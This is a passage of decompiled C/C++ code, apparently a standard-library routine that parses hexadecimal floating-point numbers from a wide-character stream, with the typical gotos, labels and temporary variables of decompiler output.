                                                                                                										} else {
                                                                                                											_t670 =  *_t940 & 0x0000ffff;
                                                                                                										}
                                                                                                									}
                                                                                                									_t671 = _t670 & 0x0000ffff;
                                                                                                									__eflags = 0xffff - _t671;
                                                                                                									if(0xffff == _t671) {
                                                                                                										goto L189;
                                                                                                									} else {
                                                                                                										 *(_t971 + 6) = _t671;
                                                                                                									}
                                                                                                								}
                                                                                                								 *((char*)(_t971 + 4)) = 1;
                                                                                                							}
                                                                                                							_t887 =  *(_t971 + 6) & 0x0000ffff;
                                                                                                							_t661 =  &_v80;
                                                                                                							while(1) {
                                                                                                								__eflags =  *_t661 - _t887;
                                                                                                								if( *_t661 == _t887) {
                                                                                                									break;
                                                                                                								}
                                                                                                								_t661 = _t661 + 2;
                                                                                                								_t940 =  &_v24;
                                                                                                								__eflags = _t661 -  &_v24;
                                                                                                								if(_t661 !=  &_v24) {
                                                                                                									continue;
                                                                                                								}
                                                                                                								break;
                                                                                                							}
                                                                                                							_t663 = _t661 -  &_v80 >> 1;
                                                                                                							__eflags = _t663 - 0x16;
                                                                                                							if(_t663 >= 0x16) {
                                                                                                								goto L171;
                                                                                                							} else {
                                                                                                								__eflags = _v156 - _t807;
                                                                                                								if(_v156 > _t807) {
                                                                                                									__eflags = _t663;
                                                                                                									if(_t663 != 0) {
                                                                                                										L199:
                                                                                                										 *_t984 =  *((intOrPtr*)(_t663 + "0123456789ABCDEFabcdef-+XxPp"));
                                                                                                										_t984 = _t984 + 1;
                                                                                                										_t807 = _t807 + 1;
                                                                                                										__eflags = _t807;
                                                                                                										_v140 = _t984;
                                                                                                										_v164 = _t807;
                                                                                                									} else {
                                                                                                										__eflags = _t807;
                                                                                                										if(_t807 != 0) {
                                                                                                											goto L199;
                                                                                                										}
                                                                                                									}
                                                                                                								} else {
                                                                                                									_v148 = _v148 + 1;
                                                                                                								}
                                                                                                								_t889 =  *_t971;
                                                                                                								_v129 = 1;
                                                                                                								__eflags = _t889;
                                                                                                								if(_t889 == 0) {
                                                                                                									L207:
                                                                                                									 *_t971 = 0;
                                                                                                									_t665 = 1;
                                                                                                								} else {
                                                                                                									__eflags =  *( *(_t889 + 0x1c));
                                                                                                									if( *( *(_t889 + 0x1c)) == 0) {
                                                                                                										L204:
                                                                                                										_t676 =  *((intOrPtr*)( *_t889 + 0x1c))() & 0x0000ffff;
                                                                                                									} else {
                                                                                                										_t940 =  *(_t889 + 0x2c);
                                                                                                										_t677 =  *_t940;
                                                                                                										__eflags = _t677;
                                                                                                										if(_t677 <= 0) {
                                                                                                											goto L204;
                                                                                                										} else {
                                                                                                											 *_t940 = _t677 - 1;
                                                                                                											_t893 =  *(_t889 + 0x1c);
                                                                                                											_t940 =  *_t893;
                                                                                                											 *_t893 = _t940 + 2;
                                                                                                											_t676 =  *_t940 & 0x0000ffff;
                                                                                                										}
                                                                                                									}
                                                                                                									__eflags = 0xffff - _t676;
                                                                                                									if(0xffff == _t676) {
                                                                                                										goto L207;
                                                                                                									} else {
                                                                                                										_t665 = 0;
                                                                                                									}
                                                                                                								}
                                                                                                								goto L208;
                                                                                                							}
                                                                                                							goto L251;
                                                                                                							L208:
                                                                                                							 *((char*)(_t971 + 4)) = _t665;
                                                                                                							_t666 = E00F7F9A0(_t971, _v136);
                                                                                                							_t1011 = _t1011 + 8;
                                                                                                							__eflags = _t666;
                                                                                                						} while (_t666 == 0);
                                                                                                						goto L172;
                                                                                                					}
                                                                                                					goto L251;
                                                                                                				} else {
                                                                                                					if(_v112 != _t807) {
                                                                                                						_v172 =  *((intOrPtr*)( *_v176 + 0x10))() & 0x0000ffff;
                                                                                                					} else {
                                                                                                						_v172 = _t807;
                                                                                                					}
                                                                                                					_v84 = _t807;
                                                                                                					_v84 = 0xf;
                                                                                                					_v88 = _t807;
                                                                                                					_v88 = _t807;
                                                                                                					_v104 = _t807;
                                                                                                					_v152 = 0xf;
                                                                                                					_v88 = 1;
                                                                                                					_v104 = _t807;
                                                                                                					_v8 = 3;
                                                                                                					_t985 = 0;
                                                                                                					_t684 = E00F7F9A0(_t971, _v136);
                                                                                                					_t817 = _v104;
                                                                                                					_t1011 = _t1010 + 8;
                                                                                                					if(_t684 != 0) {
                                                                                                						_t940 = 0xf;
                                                                                                						asm("o16 nop [eax+eax]");
                                                                                                						goto L155;
                                                                                                					} else {
                                                                                                						do {
                                                                                                							if( *((char*)(_t971 + 4)) == 0) {
                                                                                                								_t901 =  *_t971;
                                                                                                								if(_t901 == 0) {
                                                                                                									L114:
                                                                                                									 *_t971 = 0;
                                                                                                								} else {
                                                                                                									_t945 =  *( *(_t901 + 0x1c));
                                                                                                									if(_t945 == 0 ||  *((intOrPtr*)( *((intOrPtr*)(_t901 + 0x2c)))) <= 0) {
                                                                                                										_t708 =  *((intOrPtr*)( *_t901 + 0x18))() & 0x0000ffff;
                                                                                                									} else {
                                                                                                										_t708 =  *_t945 & 0x0000ffff;
                                                                                                									}
                                                                                                									_t709 = _t708 & 0x0000ffff;
                                                                                                									if(0xffff == _t709) {
                                                                                                										goto L114;
                                                                                                									} else {
                                                                                                										 *(_t971 + 6) = _t709;
                                                                                                									}
                                                                                                								}
                                                                                                								 *((char*)(_t971 + 4)) = 1;
                                                                                                							}
                                                                                                							_t897 =  *(_t971 + 6) & 0x0000ffff;
                                                                                                							_t694 =  &_v80;
                                                                                                							while( *_t694 != _t897) {
                                                                                                								_t694 = _t694 + 2;
                                                                                                								if(_t694 !=  &_v24) {
                                                                                                									continue;
                                                                                                								}
                                                                                                								break;
                                                                                                							}
                                                                                                							_t696 = _t694 -  &_v80 >> 1;
                                                                                                							if(_t696 >= 0x16) {
                                                                                                								__eflags = _v152 - 0x10;
                                                                                                								_t698 =  >=  ? _t817 :  &_v104;
                                                                                                								__eflags =  *((char*)(_t698 + _t985));
                                                                                                								if( *((char*)(_t698 + _t985)) != 0) {
                                                                                                									__eflags = _v172;
                                                                                                									if(_v172 != 0) {
                                                                                                										__eflags =  *((char*)(_t971 + 4));
                                                                                                										if( *((char*)(_t971 + 4)) == 0) {
                                                                                                											_t905 =  *_t971;
                                                                                                											__eflags = _t905;
                                                                                                											if(_t905 == 0) {
                                                                                                												L137:
                                                                                                												 *_t971 = 0;
                                                                                                											} else {
                                                                                                												_t947 =  *( *(_t905 + 0x1c));
                                                                                                												__eflags = _t947;
                                                                                                												if(_t947 == 0) {
                                                                                                													L134:
                                                                                                													_t721 =  *((intOrPtr*)( *_t905 + 0x18))() & 0x0000ffff;
                                                                                                												} else {
                                                                                                													__eflags =  *( *(_t905 + 0x2c));
                                                                                                													if( *( *(_t905 + 0x2c)) <= 0) {
                                                                                                														goto L134;
                                                                                                													} else {
                                                                                                														_t721 =  *_t947 & 0x0000ffff;
                                                                                                													}
                                                                                                												}
                                                                                                												_t722 = _t721 & 0x0000ffff;
                                                                                                												__eflags = 0xffff - _t722;
                                                                                                												if(0xffff == _t722) {
                                                                                                													goto L137;
                                                                                                												} else {
                                                                                                													 *(_t971 + 6) = _t722;
                                                                                                												}
                                                                                                											}
                                                                                                											 *((char*)(_t971 + 4)) = 1;
                                                                                                										}
                                                                                                										__eflags = ( *(_t971 + 6) & 0x0000ffff) - _v172;
                                                                                                										if(( *(_t971 + 6) & 0x0000ffff) == _v172) {
                                                                                                											_push(0);
                                                                                                											L416();
                                                                                                											_t985 = _t985 + 1;
                                                                                                											__eflags = _t985;
                                                                                                											goto L141;
                                                                                                										}
                                                                                                									}
                                                                                                								}
                                                                                                							} else {
                                                                                                								_t907 = _v164;
                                                                                                								_v129 = 1;
                                                                                                								if(_v156 > _t907) {
                                                                                                									__eflags = _t696;
                                                                                                									if(_t696 != 0) {
                                                                                                										L124:
                                                                                                										_t948 = _v140;
                                                                                                										 *_t948 =  *((intOrPtr*)(_t696 + "0123456789ABCDEFabcdef-+XxPp"));
                                                                                                										_t908 = _t907 + 1;
                                                                                                										__eflags = _t908;
                                                                                                										_v140 = _t948 + 1;
                                                                                                										_v164 = _t908;
                                                                                                									} else {
                                                                                                										__eflags = _t907;
                                                                                                										if(_t907 != 0) {
                                                                                                											goto L124;
                                                                                                										}
                                                                                                									}
                                                                                                								} else {
                                                                                                									_v148 = _v148 + 1;
                                                                                                								}
                                                                                                								_t726 =  >=  ? _t817 :  &_v104;
                                                                                                								if( *((char*)(( >=  ? _t817 :  &_v104) + _t985)) != 0x7f) {
                                                                                                									_t728 =  >=  ? _t817 :  &_v104;
                                                                                                									 *((char*)(( >=  ? _t817 :  &_v104) + _t985)) =  *((char*)(( >=  ? _t817 :  &_v104) + _t985)) + 1;
                                                                                                									L141:
                                                                                                									_t817 = _v104;
                                                                                                									_v152 = _v84;
                                                                                                								}
                                                                                                								_t900 =  *_t971;
                                                                                                								if(_t900 == 0) {
                                                                                                									L149:
                                                                                                									 *_t971 = 0;
                                                                                                									_t703 = 1;
                                                                                                								} else {
                                                                                                									if( *( *(_t900 + 0x1c)) == 0) {
                                                                                                										L146:
                                                                                                										_t714 =  *((intOrPtr*)( *_t900 + 0x1c))() & 0x0000ffff;
                                                                                                									} else {
                                                                                                										_t946 =  *((intOrPtr*)(_t900 + 0x2c));
                                                                                                										_t715 =  *_t946;
                                                                                                										if(_t715 <= 0) {
                                                                                                											goto L146;
                                                                                                										} else {
                                                                                                											 *_t946 = _t715 - 1;
                                                                                                											_t904 =  *(_t900 + 0x1c);
                                                                                                											_t951 =  *_t904;
                                                                                                											 *_t904 =  &(_t951[1]);
                                                                                                											_t714 =  *_t951 & 0x0000ffff;
                                                                                                										}
                                                                                                									}
                                                                                                									if(0xffff == _t714) {
                                                                                                										goto L149;
                                                                                                									} else {
                                                                                                										_t703 = 0;
                                                                                                									}
                                                                                                								}
                                                                                                								goto L150;
                                                                                                							}
                                                                                                							break;
                                                                                                							L150:
                                                                                                							 *((char*)(_t971 + 4)) = _t703;
                                                                                                							_t704 = E00F7F9A0(_t971, _v136);
                                                                                                							_t1011 = _t1011 + 8;
                                                                                                						} while (_t704 == 0);
                                                                                                						_t940 = _v152;
                                                                                                						if(_t985 == 0) {
                                                                                                							goto L155;
                                                                                                						} else {
                                                                                                							_t700 =  >=  ? _t817 :  &_v104;
                                                                                                							if( *((char*)(( >=  ? _t817 :  &_v104) + _t985)) <= 0) {
                                                                                                								L164:
                                                                                                								_v141 = 1;
                                                                                                							} else {
                                                                                                								_t985 = _t985 + 1;
                                                                                                								while(1) {
                                                                                                									L155:
                                                                                                									_t685 = _v168;
                                                                                                									while(_t985 != 0) {
                                                                                                										_t896 =  *_t685;
                                                                                                										if(_t896 != 0x7f) {
                                                                                                											_t985 = _t985 - 1;
                                                                                                											if(_t985 == 0) {
                                                                                                												L160:
                                                                                                												if(_t985 != 0) {
                                                                                                													L162:
                                                                                                													_t685 = _v168 + 1;
                                                                                                													if( *_t685 <= 0) {
                                                                                                														goto L155;
                                                                                                													} else {
                                                                                                														_v168 = _t685;
                                                                                                														continue;
                                                                                                													}
                                                                                                													goto L452;
                                                                                                												} else {
                                                                                                													_t691 =  >=  ? _t817 :  &_v104;
                                                                                                													_t1096 = _t896 -  *((intOrPtr*)( >=  ? _t817 :  &_v104));
                                                                                                													if(_t896 <  *((intOrPtr*)( >=  ? _t817 :  &_v104))) {
                                                                                                														goto L164;
                                                                                                													} else {
                                                                                                														goto L162;
                                                                                                													}
                                                                                                												}
                                                                                                											} else {
                                                                                                												_t693 =  >=  ? _t817 :  &_v104;
                                                                                                												if(_t896 !=  *((intOrPtr*)(( >=  ? _t817 :  &_v104) + _t985))) {
                                                                                                													goto L164;
                                                                                                												} else {
                                                                                                													goto L160;
                                                                                                												}
                                                                                                											}
                                                                                                										}
                                                                                                										goto L165;
                                                                                                									}
                                                                                                									goto L165;
                                                                                                								}
                                                                                                							}
                                                                                                						}
                                                                                                					}
                                                                                                					L165:
                                                                                                					_v8 = 1;
                                                                                                					__eflags = _t940 - 0x10;
                                                                                                					if(_t940 < 0x10) {
                                                                                                						L170:
                                                                                                						_t807 = _v164;
                                                                                                						_t984 = _v140;
                                                                                                						_v88 = 0;
                                                                                                						_v84 = 0xf;
                                                                                                						_v104 = 0;
                                                                                                						L171:
                                                                                                						__eflags = _v129;
                                                                                                						if(_v129 != 0) {
                                                                                                							L172:
                                                                                                							__eflags = _t807;
                                                                                                							if(_t807 == 0) {
                                                                                                								 *_t984 = 0x30;
                                                                                                								_t997 = _t984 + 1;
                                                                                                								__eflags = _t997;
                                                                                                								_v140 = _t997;
                                                                                                							}
                                                                                                						}
                                                                                                						_t477 = E00F7F9A0(_t971, _v136);
                                                                                                						_t1012 = _t1011 + 8;
                                                                                                						__eflags = _t477;
                                                                                                						if(_t477 != 0) {
                                                                                                							L224:
                                                                                                							_t985 = _v140;
                                                                                                						} else {
                                                                                                							__eflags =  *((intOrPtr*)(_t971 + 4)) - _t477;
                                                                                                							if( *((intOrPtr*)(_t971 + 4)) == _t477) {
                                                                                                								_t885 =  *_t971;
                                                                                                								__eflags = _t885;
                                                                                                								if(_t885 == 0) {
                                                                                                									L213:
                                                                                                									 *_t971 = 0;
                                                                                                								} else {
                                                                                                									_t940 =  *( *(_t885 + 0x1c));
                                                                                                									__eflags = _t940;
                                                                                                									if(_t940 == 0) {
                                                                                                										L210:
                                                                                                										_t658 =  *((intOrPtr*)( *_t885 + 0x18))() & 0x0000ffff;
                                                                                                									} else {
                                                                                                										__eflags =  *( *(_t885 + 0x2c));
                                                                                                										if( *( *(_t885 + 0x2c)) <= 0) {
                                                                                                											goto L210;
                                                                                                										} else {
                                                                                                											_t658 =  *_t940 & 0x0000ffff;
                                                                                                										}
                                                                                                									}
                                                                                                									_t659 = _t658 & 0x0000ffff;
                                                                                                									__eflags = 0xffff - _t659;
                                                                                                									if(0xffff == _t659) {
                                                                                                										goto L213;
                                                                                                									} else {
                                                                                                										 *(_t971 + 6) = _t659;
                                                                                                									}
                                                                                                								}
                                                                                                								 *((char*)(_t971 + 4)) = 1;
                                                                                                							}
                                                                                                							_t644 =  *((intOrPtr*)( *_v176 + 0xc))();
                                                                                                							__eflags = ( *(_t971 + 6) & 0x0000ffff) - _t644;
                                                                                                							if(( *(_t971 + 6) & 0x0000ffff) != _t644) {
                                                                                                								goto L224;
                                                                                                							} else {
                                                                                                								_t645 = E00FA1EE6(_t940);
                                                                                                								_t996 = _v140;
                                                                                                								 *_t996 =  *((intOrPtr*)( *_t645));
                                                                                                								_t985 = _t996 + 1;
                                                                                                								_t882 =  *_t971;
                                                                                                								_v140 = _t985;
                                                                                                								__eflags = _t882;
                                                                                                								if(_t882 == 0) {
                                                                                                									L223:
                                                                                                									 *_t971 = 0;
                                                                                                									 *((char*)(_t971 + 4)) = 1;
                                                                                                								} else {
                                                                                                									__eflags =  *( *(_t882 + 0x1c));
                                                                                                									if( *( *(_t882 + 0x1c)) == 0) {
                                                                                                										L220:
                                                                                                										_t651 =  *((intOrPtr*)( *_t882 + 0x1c))() & 0x0000ffff;
                                                                                                									} else {
                                                                                                										_t940 =  *(_t882 + 0x2c);
                                                                                                										_t652 =  *_t940;
                                                                                                										__eflags = _t652;
                                                                                                										if(_t652 <= 0) {
                                                                                                											goto L220;
                                                                                                										} else {
                                                                                                											 *_t940 = _t652 - 1;
                                                                                                											_t884 =  *(_t882 + 0x1c);
                                                                                                											_t940 =  *_t884;
                                                                                                											 *_t884 = _t940 + 2;
                                                                                                											_t651 =  *_t940 & 0x0000ffff;
                                                                                                										}
                                                                                                									}
                                                                                                									__eflags = 0xffff - _t651;
                                                                                                									if(0xffff == _t651) {
                                                                                                										goto L223;
                                                                                                									} else {
                                                                                                										 *((char*)(_t971 + 4)) = 0;
                                                                                                									}
                                                                                                								}
                                                                                                							}
                                                                                                						}
                                                                                                						__eflags = _t807;
                                                                                                						if(_t807 == 0) {
                                                                                                							_t624 = E00F7F9A0(_t971, _v136);
                                                                                                							_t1012 = _t1012 + 8;
                                                                                                							__eflags = _t624;
                                                                                                							if(_t624 == 0) {
                                                                                                								_t994 = _v136;
                                                                                                								_t816 = _v148;
                                                                                                								do {
                                                                                                									__eflags =  *((char*)(_t971 + 4));
                                                                                                									if( *((char*)(_t971 + 4)) == 0) {
                                                                                                										_t877 =  *_t971;
                                                                                                										__eflags = _t877;
                                                                                                										if(_t877 == 0) {
                                                                                                											L236:
                                                                                                											 *_t971 = 0;
                                                                                                										} else {
                                                                                                											_t940 =  *( *(_t877 + 0x1c));
                                                                                                											__eflags = _t940;
                                                                                                											if(_t940 == 0) {
                                                                                                												L233:
                                                                                                												_t633 =  *((intOrPtr*)( *_t877 + 0x18))() & 0x0000ffff;
                                                                                                											} else {
                                                                                                												__eflags =  *( *(_t877 + 0x2c));
                                                                                                												if( *( *(_t877 + 0x2c)) <= 0) {
                                                                                                													goto L233;
                                                                                                												} else {
                                                                                                													_t633 =  *_t940 & 0x0000ffff;
                                                                                                												}
                                                                                                											}
                                                                                                											_t634 = _t633 & 0x0000ffff;
                                                                                                											__eflags = 0xffff - _t634;
                                                                                                											if(0xffff == _t634) {
                                                                                                												goto L236;
                                                                                                											} else {
                                                                                                												 *(_t971 + 6) = _t634;
                                                                                                											}
                                                                                                										}
                                                                                                										 *((char*)(_t971 + 4)) = 1;
                                                                                                									}
                                                                                                									__eflags = ( *(_t971 + 6) & 0x0000ffff) - _v80;
                                                                                                									if(( *(_t971 + 6) & 0x0000ffff) == _v80) {
                                                                                                										_t876 =  *_t971;
                                                                                                										_t816 = _t816 - 1;
                                                                                                										_v129 = 1;
                                                                                                										__eflags = _t876;
                                                                                                										if(_t876 == 0) {
                                                                                                											L246:
                                                                                                											 *_t971 = 0;
                                                                                                											_t628 = 1;
                                                                                                										} else {
                                                                                                											__eflags =  *( *(_t876 + 0x1c));
                                                                                                											if( *( *(_t876 + 0x1c)) == 0) {
                                                                                                												L243:
                                                                                                												_t639 =  *((intOrPtr*)( *_t876 + 0x1c))() & 0x0000ffff;
                                                                                                											} else {
                                                                                                												_t940 =  *(_t876 + 0x2c);
                                                                                                												_t640 =  *_t940;
                                                                                                												__eflags = _t640;
                                                                                                												if(_t640 <= 0) {
                                                                                                													goto L243;
                                                                                                												} else {
                                                                                                													 *_t940 = _t640 - 1;
                                                                                                													_t880 =  *(_t876 + 0x1c);
                                                                                                													_t940 =  *_t880;
                                                                                                													 *_t880 = _t940 + 2;
                                                                                                													_t639 =  *_t940 & 0x0000ffff;
                                                                                                												}
                                                                                                											}
                                                                                                											__eflags = 0xffff - _t639;
                                                                                                											if(0xffff == _t639) {
                                                                                                												goto L246;
                                                                                                											} else {
                                                                                                												_t628 = 0;
                                                                                                											}
                                                                                                										}
                                                                                                										goto L247;
                                                                                                									}
                                                                                                									break;
                                                                                                									L247:
                                                                                                									 *((char*)(_t971 + 4)) = _t628;
                                                                                                									_t629 = E00F7F9A0(_t971, _t994);
                                                                                                									_t1012 = _t1012 + 8;
                                                                                                									__eflags = _t629;
                                                                                                								} while (_t629 == 0);
                                                                                                								_t985 = _v140;
                                                                                                								_v148 = _t816;
                                                                                                								_t807 = _v164;
                                                                                                							}
                                                                                                							_t625 = _v148;
                                                                                                							__eflags = _t625;
                                                                                                							if(_t625 < 0) {
                                                                                                								 *_t985 = 0x30;
                                                                                                								_t985 = _t985 + 1;
                                                                                                								_t626 = _t625 + 1;
                                                                                                								__eflags = _t626;
                                                                                                								_v140 = _t985;
                                                                                                								_v148 = _t626;
                                                                                                							}
                                                                                                						}
                                                                                                						L251:
                                                                                                						_t478 = E00F7F9A0(_t971, _v136);
                                                                                                						_t1013 = _t1012 + 8;
                                                                                                						__eflags = _t478;
                                                                                                						if(_t478 != 0) {
                                                                                                							L279:
                                                                                                							_t479 = _v129;
                                                                                                							__eflags = _t479;
                                                                                                							if(_t479 == 0) {
                                                                                                								_t808 = _v140;
                                                                                                							} else {
                                                                                                								goto L280;
                                                                                                							}
                                                                                                						} else {
                                                                                                							do {
                                                                                                								__eflags =  *((char*)(_t971 + 4));
                                                                                                								if( *((char*)(_t971 + 4)) == 0) {
                                                                                                									_t872 =  *_t971;
                                                                                                									__eflags = _t872;
                                                                                                									if(_t872 == 0) {
                                                                                                										L261:
                                                                                                										 *_t971 = 0;
                                                                                                									} else {
                                                                                                										_t940 =  *( *(_t872 + 0x1c));
                                                                                                										__eflags = _t940;
                                                                                                										if(_t940 == 0) {
                                                                                                											L258:
                                                                                                											_t613 =  *((intOrPtr*)( *_t872 + 0x18))() & 0x0000ffff;
                                                                                                										} else {
                                                                                                											__eflags =  *( *(_t872 + 0x2c));
                                                                                                											if( *( *(_t872 + 0x2c)) <= 0) {
                                                                                                												goto L258;
                                                                                                											} else {
                                                                                                												_t613 =  *_t940 & 0x0000ffff;
                                                                                                											}
                                                                                                										}
                                                                                                										_t614 = _t613 & 0x0000ffff;
                                                                                                										__eflags = 0xffff - _t614;
                                                                                                										if(0xffff == _t614) {
                                                                                                											goto L261;
                                                                                                										} else {
                                                                                                											 *(_t971 + 6) = _t614;
                                                                                                										}
                                                                                                									}
                                                                                                									 *((char*)(_t971 + 4)) = 1;
                                                                                                								}
                                                                                                								_t869 =  *(_t971 + 6) & 0x0000ffff;
                                                                                                								_t605 =  &_v80;
                                                                                                								while(1) {
                                                                                                									__eflags =  *_t605 - _t869;
                                                                                                									if( *_t605 == _t869) {
                                                                                                										break;
                                                                                                									}
                                                                                                									_t605 = _t605 + 2;
                                                                                                									_t940 =  &_v24;
                                                                                                									__eflags = _t605 -  &_v24;
                                                                                                									if(_t605 !=  &_v24) {
                                                                                                										continue;
                                                                                                									}
                                                                                                									break;
                                                                                                								}
                                                                                                								_t607 = _t605 -  &_v80 >> 1;
                                                                                                								__eflags = _t607 - 0x16;
                                                                                                								if(_t607 >= 0x16) {
                                                                                                									goto L279;
                                                                                                								} else {
                                                                                                									__eflags = _t807 - _v156;
                                                                                                									if(_t807 < _v156) {
                                                                                                										 *_t985 =  *((intOrPtr*)(_t607 + "0123456789ABCDEFabcdef-+XxPp"));
                                                                                                										_t985 = _t985 + 1;
                                                                                                										_v140 = _t985;
                                                                                                										_t807 = _t807 + 1;
                                                                                                										__eflags = _t807;
                                                                                                									}
                                                                                                									_t871 =  *_t971;
                                                                                                									_v129 = 1;
                                                                                                									__eflags = _t871;
                                                                                                									if(_t871 == 0) {
                                                                                                										L276:
                                                                                                										 *_t971 = 0;
                                                                                                										_t608 = 1;
                                                                                                									} else {
                                                                                                										__eflags =  *( *(_t871 + 0x1c));
                                                                                                										if( *( *(_t871 + 0x1c)) == 0) {
                                                                                                											L273:
                                                                                                											_t619 =  *((intOrPtr*)( *_t871 + 0x1c))() & 0x0000ffff;
                                                                                                										} else {
                                                                                                											_t940 =  *(_t871 + 0x2c);
                                                                                                											_t620 =  *_t940;
                                                                                                											__eflags = _t620;
                                                                                                											if(_t620 <= 0) {
                                                                                                												goto L273;
                                                                                                											} else {
                                                                                                												 *_t940 = _t620 - 1;
                                                                                                												_t875 =  *(_t871 + 0x1c);
                                                                                                												_t940 =  *_t875;
                                                                                                												 *_t875 = _t940 + 2;
                                                                                                												_t619 =  *_t940 & 0x0000ffff;
                                                                                                											}
                                                                                                										}
                                                                                                										__eflags = 0xffff - _t619;
                                                                                                										if(0xffff == _t619) {
                                                                                                											goto L276;
                                                                                                										} else {
                                                                                                											_t608 = 0;
                                                                                                										}
                                                                                                									}
                                                                                                									goto L277;
                                                                                                								}
                                                                                                								goto L403;
                                                                                                								L277:
                                                                                                								 *((char*)(_t971 + 4)) = _t608;
                                                                                                								_t609 = E00F7F9A0(_t971, _v136);
                                                                                                								_t1013 = _t1013 + 8;
                                                                                                								__eflags = _t609;
                                                                                                							} while (_t609 == 0);
                                                                                                							L280:
                                                                                                							_t515 = E00F7F9A0(_t971, _v136);
                                                                                                							_t1013 = _t1013 + 8;
                                                                                                							__eflags = _t515;
                                                                                                							if(_t515 != 0) {
                                                                                                								L410:
                                                                                                								_t808 = _v140;
                                                                                                							} else {
                                                                                                								_t516 =  *((intOrPtr*)(_t971 + 4));
                                                                                                								__eflags = _t516;
                                                                                                								if(_t516 == 0) {
                                                                                                									_t867 =  *_t971;
                                                                                                									__eflags = _t867;
                                                                                                									if(_t867 == 0) {
                                                                                                										L289:
                                                                                                										 *_t971 = 0;
                                                                                                									} else {
                                                                                                										_t943 =  *( *(_t867 + 0x1c));
                                                                                                										__eflags = _t943;
                                                                                                										if(_t943 == 0) {
                                                                                                											L286:
                                                                                                											_t602 =  *((intOrPtr*)( *_t867 + 0x18))() & 0x0000ffff;
                                                                                                										} else {
                                                                                                											__eflags =  *( *(_t867 + 0x2c));
                                                                                                											if( *( *(_t867 + 0x2c)) <= 0) {
                                                                                                												goto L286;
                                                                                                											} else {
                                                                                                												_t602 =  *_t943 & 0x0000ffff;
                                                                                                											}
                                                                                                										}
                                                                                                										_t603 = _t602 & 0x0000ffff;
                                                                                                										__eflags = 0xffff - _t603;
                                                                                                										if(0xffff == _t603) {
                                                                                                											goto L289;
                                                                                                										} else {
                                                                                                											 *(_t971 + 6) = _t603;
                                                                                                										}
                                                                                                									}
                                                                                                									 *((char*)(_t971 + 4)) = 1;
                                                                                                									_t516 = 1;
                                                                                                								}
                                                                                                								_t940 =  *(_t971 + 6) & 0x0000ffff;
                                                                                                								__eflags = _t940 - _v26;
                                                                                                								if(_t940 == _v26) {
                                                                                                									L304:
                                                                                                									_t815 = _v140;
                                                                                                									 *_t815 = 0x70;
                                                                                                									_t808 = _t815 + 1;
                                                                                                									_t838 =  *_t971;
                                                                                                									__eflags = _t838;
                                                                                                									if(_t838 == 0) {
                                                                                                										L311:
                                                                                                										 *_t971 = 0;
                                                                                                										_t517 = 1;
                                                                                                									} else {
                                                                                                										__eflags =  *( *(_t838 + 0x1c));
                                                                                                										if( *( *(_t838 + 0x1c)) == 0) {
                                                                                                											L308:
                                                                                                											_t588 =  *((intOrPtr*)( *_t838 + 0x1c))() & 0x0000ffff;
                                                                                                										} else {
                                                                                                											_t940 =  *(_t838 + 0x2c);
                                                                                                											_t589 =  *_t940;
                                                                                                											__eflags = _t589;
                                                                                                											if(_t589 <= 0) {
                                                                                                												goto L308;
                                                                                                											} else {
                                                                                                												 *_t940 = _t589 - 1;
                                                                                                												_t863 =  *(_t838 + 0x1c);
                                                                                                												_t940 =  *_t863;
                                                                                                												 *_t863 = _t940 + 2;
                                                                                                												_t588 =  *_t940 & 0x0000ffff;
                                                                                                											}
                                                                                                										}
                                                                                                										__eflags = 0xffff - _t588;
                                                                                                										if(0xffff == _t588) {
                                                                                                											goto L311;
                                                                                                										} else {
                                                                                                											_t517 = 0;
                                                                                                										}
                                                                                                									}
                                                                                                									 *((char*)(_t971 + 4)) = _t517;
                                                                                                									_t985 = 0;
                                                                                                									_v129 = 0;
                                                                                                									_t518 = E00F7F9A0(_t971, _v136);
                                                                                                									_t1017 = _t1013 + 8;
                                                                                                									__eflags = _t518;
                                                                                                									if(_t518 == 0) {
                                                                                                										_t851 =  *((intOrPtr*)(_t971 + 4));
                                                                                                										__eflags = _t851;
                                                                                                										if(_t851 == 0) {
                                                                                                											_t860 =  *_t971;
                                                                                                											__eflags = _t860;
                                                                                                											if(_t860 == 0) {
                                                                                                												L321:
                                                                                                												 *_t971 = _t985;
                                                                                                											} else {
                                                                                                												_t940 =  *( *(_t860 + 0x1c));
                                                                                                												__eflags = _t940;
                                                                                                												if(_t940 == 0) {
                                                                                                													L318:
                                                                                                													_t582 =  *((intOrPtr*)( *_t860 + 0x18))() & 0x0000ffff;
                                                                                                												} else {
                                                                                                													__eflags =  *( *(_t860 + 0x2c));
                                                                                                													if( *( *(_t860 + 0x2c)) <= 0) {
                                                                                                														goto L318;
                                                                                                													} else {
                                                                                                														_t582 =  *_t940 & 0x0000ffff;
                                                                                                													}
                                                                                                												}
                                                                                                												_t583 = _t582 & 0x0000ffff;
                                                                                                												__eflags = 0xffff - _t583;
                                                                                                												if(0xffff == _t583) {
                                                                                                													goto L321;
                                                                                                												} else {
                                                                                                													 *(_t971 + 6) = _t583;
                                                                                                												}
                                                                                                											}
                                                                                                											 *((char*)(_t971 + 4)) = 1;
                                                                                                											_t851 = 1;
                                                                                                										}
                                                                                                										_t556 =  *(_t971 + 6) & 0x0000ffff;
                                                                                                										__eflags = _t556 - _v34;
                                                                                                										if(_t556 != _v34) {
                                                                                                											_t940 = _t556;
                                                                                                											__eflags = _t851;
                                                                                                											if(_t851 == 0) {
                                                                                                												_t855 =  *_t971;
                                                                                                												__eflags = _t855;
                                                                                                												if(_t855 == 0) {
                                                                                                													L341:
                                                                                                													 *_t971 = _t985;
                                                                                                													_t564 = _t556 & 0x0000ffff;
                                                                                                												} else {
                                                                                                													_t942 =  *( *(_t855 + 0x1c));
                                                                                                													__eflags = _t942;
                                                                                                													if(_t942 == 0) {
                                                                                                														L337:
                                                                                                														_t568 =  *((intOrPtr*)( *_t855 + 0x18))() & 0x0000ffff;
                                                                                                													} else {
                                                                                                														__eflags =  *((intOrPtr*)( *((intOrPtr*)(_t855 + 0x2c)))) - _t985;
                                                                                                														if( *((intOrPtr*)( *((intOrPtr*)(_t855 + 0x2c)))) <= _t985) {
                                                                                                															goto L337;
                                                                                                														} else {
                                                                                                															_t568 =  *_t942 & 0x0000ffff;
                                                                                                														}
                                                                                                													}
                                                                                                													_t564 = _t568 & 0x0000ffff;
                                                                                                													__eflags = 0xffff - _t564;
                                                                                                													if(0xffff == _t564) {
                                                                                                														_t556 =  *(_t971 + 6) & 0x0000ffff;
                                                                                                														goto L341;
                                                                                                													} else {
                                                                                                														 *(_t971 + 6) = _t564;
                                                                                                													}
                                                                                                												}
                                                                                                												 *((char*)(_t971 + 4)) = 1;
                                                                                                												_t940 = _t564 & 0x0000ffff;
                                                                                                											}
                                                                                                											__eflags = _t940 - _v36;
